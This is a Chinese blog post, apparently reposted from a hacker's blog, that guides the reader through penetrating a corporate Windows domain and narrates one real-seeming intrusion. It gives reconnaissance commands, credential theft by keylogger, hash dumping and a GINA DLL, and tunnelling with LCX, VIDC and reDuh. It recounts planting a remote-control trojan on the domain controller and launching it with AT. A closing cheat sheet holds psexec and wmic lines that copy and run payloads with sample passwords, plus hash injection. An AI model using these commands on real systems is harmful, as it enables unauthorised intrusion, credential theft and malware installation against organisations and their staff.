| by Ra1nker .ipconfig /all //可以查看到當(dāng)前網(wǎng)卡配置信息,包括所屬域以及IP段 這個(gè)命令可以看到:主機(jī)名字—shwdm,IP–192.168.103.8,網(wǎng)關(guān)IP—192.168.103.10,DNS 域名解析地址IP—192.168.100.1,主WINS服務(wù)器IP—10.0.22.5 2.net view //顯示正由指定的計(jì)算機(jī)共享的域、計(jì)算機(jī)或資源的列表。如果在沒有參數(shù)的情況下使用,則 net view 顯示當(dāng)前域中的計(jì)算機(jī)列表。 可以看到我們當(dāng)前域共有8臺(tái)機(jī)器,我們的這臺(tái)機(jī)器–SHWDM 也在其中 3.ping 機(jī)器名 //顯示該機(jī)器名的IP 如圖PING BJCWSERVER,我們得到這個(gè)名字叫BJCWSERVER的主機(jī)IP為192.168.103.50 4.net view /domain //查看有多少域 5.net view /domain:testdomain(testdomain 假設(shè)為目標(biāo)的其中一個(gè)域) //此命令是查看 testdomain域中的計(jì)算機(jī)列表 我們分別查看這三個(gè)域中的計(jì)算機(jī)列表,可以查到MYGROUP域下面只有一臺(tái)叫NCSERVER的機(jī)器,而且系統(tǒng)是LINUX的,是個(gè)SAMBA 服務(wù)器 6.net user /domain //獲取所有域用戶列表 7.net group /domain //獲取域用戶組信息 8.net group “domain admins” /domain //查看與管理組成員 9.net user domain-admin /domain //查看管理員登陸時(shí)間,密碼過期時(shí)間,是否有登陸腳本,組分配等信息! 10.net time /domain //可以查看域時(shí)間,以及域服務(wù)器的名字(快速查找域的方法之一 By LCX) 總結(jié)下,通過這次信息收集,我們可以得到: 1.這個(gè)內(nèi)網(wǎng)的網(wǎng)關(guān)為 192.168.103.10,DNS 域名解析IP為192.168.100.1,主WINS服務(wù)器為10.0.22.5 2.一共有三個(gè)域,其中WORKGROUP域下面有8臺(tái)機(jī)器(本機(jī)亦屬其域),POLYCOMRSS 域下面有一臺(tái),MYGROUP域下面有一臺(tái)SAMBA SERVER,系統(tǒng)是LINUX 1.收集信息。 1-1.不論什么途徑獲得的內(nèi)網(wǎng)機(jī)器,確定他在內(nèi)網(wǎng)后,我們首先就要了解這臺(tái)機(jī)器的所屬人員,如果我們的目 標(biāo)是公司,那我們就要了解這個(gè)人在公司里的職位,他是個(gè)什么身份,有多大的權(quán)利,這都關(guān)系到他在內(nèi)網(wǎng)里的權(quán)限。因?yàn)椋鳛榇蠊荆粋(gè)高權(quán)限的人他在內(nèi)網(wǎng) 里所要用到的東西就多,那么相對(duì)他的機(jī)器,當(dāng)然權(quán)限就會(huì)比一般普通員工的高很多,這在我的滲透過程中是常見的。 既然有了他的機(jī)器,那么翻翻他的電腦這是必要的,如果你說要怎么翻,你可以嘗試熟悉他的電腦甚至比他本人還熟,那你就算了解詳細(xì)了。一臺(tái)個(gè)人用的電腦,從上面翻出與他自己相關(guān)的一些信息,和大量公司信息應(yīng)該是沒有問題的,除非,這是臺(tái)新電腦。 1-2.了解了一定的人員信息,期間你要記下你所掌握到的賬號(hào),密碼這些重要數(shù)據(jù),以后有一定的用,所以, 在你滲之前,不妨建個(gè)記事本將重要信息保存起來,寫個(gè)記事本不會(huì)浪費(fèi)你多少時(shí)間。接下來,我們就應(yīng)該對(duì)這個(gè)網(wǎng)絡(luò)進(jìn)行一定的了解,他是一般的內(nèi)網(wǎng),還是域? 一般大公司都會(huì)用域的,我們只需要查一下就知道,要想對(duì)他進(jìn)行滲透,你就必須了解他的網(wǎng)絡(luò)拓補(bǔ),當(dāng)然,一些太具體的物理上我們是無法了解的,我們只能了解 我們所能知道的。不管他是INT,DMZ,LAN,我們必須足夠掌握。在這,我們就會(huì)用到一定的命令,相信大家應(yīng)該都很熟悉。 ipconfig /all 查詢一下本機(jī)的一些情況,IP段 網(wǎng)關(guān) 屬于不屬于域 net view 查詢一些存在聯(lián)系的機(jī)器,一般以機(jī)器名顯示,我們需要對(duì)其PING出IP,一是方便查詢哪些重要機(jī)器的IP,二是方便查詢存在幾個(gè)段 net view /domain 查詢有幾個(gè)域 因?yàn)榇笮途W(wǎng)絡(luò)里面一般不止一個(gè)域的 net group /domain 查詢域里面的組 net user /domain 查詢域用戶 net group “domain admins” /domain 查詢域管理用戶組 這些都是我們需要了解的,當(dāng)然有時(shí)候還會(huì)需要再查詢一些信息,NET命令下你們都會(huì)找到,不需要我再重復(fù),具體的情況具體分析問題。 2.信息歸檔 2-1。有了信息,我們就要對(duì)信息進(jìn)行一定的歸檔,將每個(gè)機(jī)器名所對(duì)應(yīng)的IP歸檔,方便用時(shí)不會(huì)亂。 2-2。查詢出的用戶,管理員,我們也必須歸檔。 2-3。查詢信息時(shí)可能出現(xiàn)的有利用價(jià)值信息必須歸檔。 3.技術(shù)利用 3-1。不論是通過鍵盤記錄。或者HASH的抓取,我們需要將賬號(hào),密碼,郵箱,凡是涉及關(guān)鍵數(shù)據(jù)的全部保存,一方面是準(zhǔn)備滲透的資料,二是防止當(dāng)前利用機(jī)器會(huì)掉。 3-1-1。利用遠(yuǎn)控的鍵盤記錄進(jìn)行抓取。 3-1-2。利用PWDUMP7或者GETHASHES進(jìn)行抓取HASH,然后破解。GETHASHES V1.4后 可以抓取域的全部HASH。 3-1-3。用GINASTUB.DLL獲取管理員的賬號(hào)和密碼。因?yàn)橛蚬芾韱T有權(quán)限登陸任何一臺(tái)機(jī)器。種上這個(gè)只是方便記錄他所登陸的密碼。INSTALL后,會(huì)在SYSYTEM32下生成一個(gè) FAXMODE.INC 文件記錄密碼。 3-2。有了內(nèi)網(wǎng),很多東西我們是沒有必要直接在當(dāng)前利用機(jī)器上操作的,別人雖然是內(nèi)網(wǎng),但是不代表他沒有防御系統(tǒng),所以,我們建立SOCKS或者VPN是很有必要的,建立SOCKS相信大家都會(huì)了吧。 3-2-1。我在這推薦 VIDC 這個(gè)工具,很方便,在CMD下直接操 VIDC.EXE -D -P PORT 就可以了。 3-2-2。在利用機(jī)器上使用LCX,CMD下 LCX.EXE -SLAVE 服務(wù)器IP PORT 127.0.0.1 PORT,然后到服務(wù)器上 CMD下 LCX.EXE -LISTEN 服務(wù)器IP PORT 任意PORT。 3-2-3。建立SOCKS后在本地可以用SOCKSCAP來進(jìn)行連接,成功連接后該操作什么就看你們自己了。 基本上我們就只能操作這么多了,后面已經(jīng)沒有什么技術(shù)上的再使用或利用,但是這中間的經(jīng)驗(yàn)不少,所需要處理的細(xì)節(jié)也不少。 我們?cè)诘玫絻?nèi)網(wǎng)機(jī)器后,如果他存在域,但是沒有使用域賬號(hào)怎么辦?那我們只能查詢或者想盡一切手段獲得他常用的賬號(hào)密碼,然后利用這個(gè)賬號(hào)密碼,再通過SOCKS進(jìn)入域。這其中就關(guān)系到各位同行查看控制機(jī)器的文件,還有記錄密碼,GINA,HASH破解,這些都是必須的。 進(jìn)入域后,我們又該怎么做,建立SOCKS后又該怎么做。我們可以扔S上去查看主要的端口,我們可以對(duì)端口 進(jìn)行弱口令的嘗試,我們可以針對(duì)內(nèi)網(wǎng)的WEB進(jìn)行檢測,方式很多,甚至你可以用MS08-067對(duì)另一臺(tái)機(jī)器進(jìn)行突破,但是相信我,能使用域的機(jī)器,大部 分都是補(bǔ)丁打齊的。我們能利用的很少,但是不能灰心,只要能在內(nèi)網(wǎng)穿梭,我們至少在防御上會(huì)輕松很多,我們需要的只是耐心和時(shí)間。 一旦擁有密碼,我們就可以嘗試IPC連接,直接拿下域,這就得看你們的權(quán)限有多大。 net use \\IP\ipc$ password /user:username@domain 推薦使用這樣的方式輸入賬號(hào)和密碼,為什么?如果用戶名存在空格,你這樣輸會(huì)保險(xiǎn)些。什么 域用戶不能存在空格? 是的,以前我也認(rèn)為不會(huì),微軟的講師也說不會(huì),不過,經(jīng)過我的測試和經(jīng)驗(yàn),那是假的,域 完全可以空格,除了 user name 這樣的,還可以存在 user na me ,不信 你可以試試。 建立IPC后,你只是想COPY文件 或者 RAR文件 再或者種馬 那就是你的自由了。 后話:最近因?yàn)樵跐B域,在滲透過程中,也確實(shí)出現(xiàn)一些問題,幾次都是不知如何進(jìn)行,其實(shí)在技術(shù)上,并沒有什么障礙。主要是在于對(duì)方有著比較強(qiáng)的主防御,而 我的遠(yuǎn)控最開始連CMD都無法執(zhí)行,后經(jīng)過幾天的環(huán)境測試,突破了CMD。有了CMD后,進(jìn)行了查詢,獲得了一些信息,就開始了往下的滲透,被控機(jī)器的密 碼我不是跑出來的,我是翻他的文件翻出他常用密碼的。因?yàn)樗麤]有使用域賬號(hào),都是以系統(tǒng)賬號(hào)登陸,所以無法查看域。我只能用他的域賬號(hào)建立IPC連接,查 找到內(nèi)網(wǎng)的一個(gè)WEB服務(wù),將其滲透后才算拿下了一個(gè)穩(wěn)定的內(nèi)網(wǎng)機(jī)器。 拿下內(nèi)網(wǎng)WEB服務(wù)器后,我就已經(jīng)完全在域內(nèi),沒有使用HASH INJECTION,我是先查詢了DOMAIN ADMINS,發(fā)現(xiàn)WEB服務(wù)器上的賬號(hào)就屬于這個(gè)組,PW后得到了HASH,破解掉我就連向了域控服務(wù)器的IPC$。 連接了IPC$,直接在其SYSYTEM32下扔了一個(gè)遠(yuǎn)控,然后用AT命令將其啟動(dòng),這期間我嘗試了5個(gè)SHIFT,但是SHIFT關(guān)閉后,我的遠(yuǎn)控也會(huì)掉,所以排除了這種方法,還是用AT來ADD NEW JOB 比較方便。 給域控服務(wù)器種了遠(yuǎn)控,利用CMD來GETHASHES了全部的HASHES進(jìn)行破解,很幸運(yùn)的查到了文件管理組的用戶,這才有了我后面的目標(biāo)達(dá)成。 總的來說,我這次的滲透比較運(yùn)氣好,中間麻煩事不是太多,不過也花了半個(gè)月的時(shí)間,時(shí)間大部分花在測試防御環(huán)境,軟件免殺,木馬免殺,查找資料這些上面。 后來,我獲取了他的網(wǎng)絡(luò)拓補(bǔ)圖,發(fā)現(xiàn)我所呆的區(qū)域只是一個(gè)小小的域,還有好幾個(gè)域我還沒有涉及到,在域的前面是DMZ,而DMZ前面當(dāng)然是INT了。 已經(jīng)很晚了,本來是在寫一份詳細(xì)的滲透過程,不過因?yàn)橐恢惫ぷ鳎芏嗉?xì)節(jié)沒有辦法當(dāng)場記錄,所以,暫時(shí)在BLOG上寫一些能想到的,后面如果有時(shí)間有環(huán)境,會(huì)再補(bǔ)充更多的細(xì)節(jié)以及圖片和在滲透時(shí)所遇到的麻煩,如何解決等寫出來。 常用命令 net view 查看同一域/工作組的計(jì)算機(jī)列表 net view /domain 查看域/工作組列表 net view /domain:Secwing 查看Secwing域中 計(jì)算機(jī)列表 net group /domain 查看所在域的組 net user /domain 查看所在域用戶 net user /domain zerosoul 12345678 修改域用戶密碼,需要域管理員權(quán)限,或者Ctrl+Alt+Del點(diǎn)擊修改則不需要域管理員權(quán)限 net localgroup administrators SECWING\zerosoul /add 域Users組用戶添加到本地Administrators組,需要本地管理員或域管理員在本機(jī)登陸域后進(jìn)行 下面的命令 只能用于 域控制器: net group “Domain controllers” 查看域控制器(如果有多臺(tái)) net group 查看域的組 net group “domain admins” 查看域管理員 net group “domain users” 查看域管理員 PS:打開配置域控制器向?qū)У拿? dcpromo psexec /accepteula 繞過第一次驗(yàn)證窗口 mstsc/admin 解決hash無法抓出問題 wmic /node:172.16.19.96 /user:ABIMAQ\Administrator /password:k78m90 process call create c:\kav\2009.exe psexec.exe -s -u administrator -p k78m90 \\172.16.16.2 -c c:\kav\2009.exe 拷貝文件并且執(zhí)行 psexec.exe -s -u administrator -p km3h7i \\172.16.16.2 -c c:\kav\gsecdump.exe -u 抓取hash net use \\172.16.16.2\IPC$ “k78m90″ /user:”admintitrator” net use \\172.16.16.2\IPC$ “k78m90″ /user:”aABIMAQ\Administrator” net time \\172.16.16.2 at \\172.16.16.2 13:50 2009.exe java reDuhClient fdc1.cnhan.com http 80 /admin/reduh.aspx reduh連接命令 [createTunnel]1234:127.0.0.1:3389 端口轉(zhuǎn)向命令 iam-alt -h user-hash 這樣hash就被注入了 whosthere-alt.exe 來查看是否被注入成功。 |
免責(zé)聲明:本站部分文章和圖片均來自用戶投稿和網(wǎng)絡(luò)收集,旨在傳播知識(shí),文章和圖片版權(quán)歸原作者及原出處所有,僅供學(xué)習(xí)與參考,請(qǐng)勿用于商業(yè)用途,如果損害了您的權(quán)利,請(qǐng)聯(lián)系我們及時(shí)修正或刪除。謝謝!
始終以前瞻性的眼光聚焦站長、創(chuàng)業(yè)、互聯(lián)網(wǎng)等領(lǐng)域,為您提供最新最全的互聯(lián)網(wǎng)資訊,幫助站長轉(zhuǎn)型升級(jí),為互聯(lián)網(wǎng)創(chuàng)業(yè)者提供更加優(yōu)質(zhì)的創(chuàng)業(yè)信息和品牌營銷服務(wù),與站長一起進(jìn)步!讓互聯(lián)網(wǎng)創(chuàng)業(yè)者不再孤獨(dú)!
掃一掃,關(guān)注站長網(wǎng)微信
大家都在看
